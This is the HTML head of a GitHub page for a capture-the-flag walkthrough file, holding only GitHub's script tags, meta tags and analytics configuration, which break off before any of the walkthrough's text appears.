type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Bs1K/vyZ2bHvgl7D760X4B4rTd1A8ZhqnIzBYtMmXdF7vZ8VmWUo5Xo1jbbTRTTigQeLFs7E9Fa6naPM7tGsyQ==" type="application/javascript" src="https://github.githubassets.com/assets/diffs-06cd4afe.js"></script>
<meta name="viewport" content="width=device-width"> <title>DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF · GitHub</title> <meta name="description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/5d2723a0366d21d3798d3536f6978176bd5bddeea9974431e3c884a0bb8e0ca0/deepakdhayal/DeconstruCTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF" /><meta name="twitter:description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/5d2723a0366d21d3798d3536f6978176bd5bddeea9974431e3c884a0bb8e0ca0/deepakdhayal/DeconstruCTF" /><meta property="og:image:alt" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="DeconstruCTF/WalkThrough.md at Master · deepakdhayal/DeconstruCTF" /><meta property="og:url" content="https://github.com/deepakdhayal/DeconstruCTF" /><meta property="og:description" content="Contribute to deepakdhayal/DeconstruCTF development by creating an account on GitHub." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="B240:5EA8:173BB02:186A594:61830688" data-pjax-transient="true"/><meta name="html-safe-nonce" content="5ff62d0b0c9a895db373b0eaaff63d06533afd933d0b1c22bdcf84d8838076ef" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCMjQwOjVFQTg6MTczQkIwMjoxODZBNTk0OjYxODMwNjg4IiwidmlzaXRvcl9pZCI6IjY5ODk0NjYzOTg1OTA0MzcwMDEiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="edaff9a1da62528cd47ec775c9a12bcce9bec67f700b9883115325625da86682" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:412702904" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-pjax-transient="true" />
<meta name="optimizely-datafile" content="{"version": "4", "rollouts": [], "typedAudiences": [], "anonymizeIP": true, "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [{"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20438636352", "key": "control"}, {"variables": [], "id": "20484957397", "key": "treatment"}], "id": "20479227424", "key": "growth_ghec_onboarding_experience", "layerId": "20467848595", "trafficAllocation": [{"entityId": "20484957397", "endOfRange": 1000}, {"entityId": "20484957397", "endOfRange": 3000}, {"entityId": "20484957397", "endOfRange": 5000}, {"entityId": "20484957397", "endOfRange": 6000}, {"entityId": "20484957397", "endOfRange": 8000}, {"entityId": "20484957397", "endOfRange": 10000}], "forcedVariations": {"85e2238ce2b9074907d7a3d91d6feeae": "control"}}, {"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20619540113", "key": "control"}, {"variables": [], "id": "20598530123", "key": "treatment"}], "id": "20619150105", "key": "dynamic_seats", "layerId": "20615170077", "trafficAllocation": [{"entityId": "20598530123", "endOfRange": 5000}, {"entityId": "20619540113", "endOfRange": 10000}], "forcedVariations": {}}, {"status": "Running", "audienceIds": [], "variations": [{"variables": [], "id": "20667381018", "key": "control"}, {"variables": [], "id": "20680930759", "key": "treatment"}], "id": "20652570897", "key": "project_genesis", "layerId": "20672300363", "trafficAllocation": [{"entityId": "20667381018", "endOfRange": 5000}, {"entityId": "20667381018", "endOfRange": 10000}], "forcedVariations": {"83356e17066d336d1803024138ecb683": "treatment", "18e31c8a9b2271332466133162a4aa0d": "treatment", "10f8ab3fbc5ebe989a36a05f79d48f32": "treatment", "1686089f6d540cd2deeaec60ee43ecf7": "treatment"}}], "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "groups": [], "sdkKey": "WTc6awnGuYDdG98CYRban", "environmentKey": "production", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event.do_not_use_in_production"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": ["20479227424", "20619150105"], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": [], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": "click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, 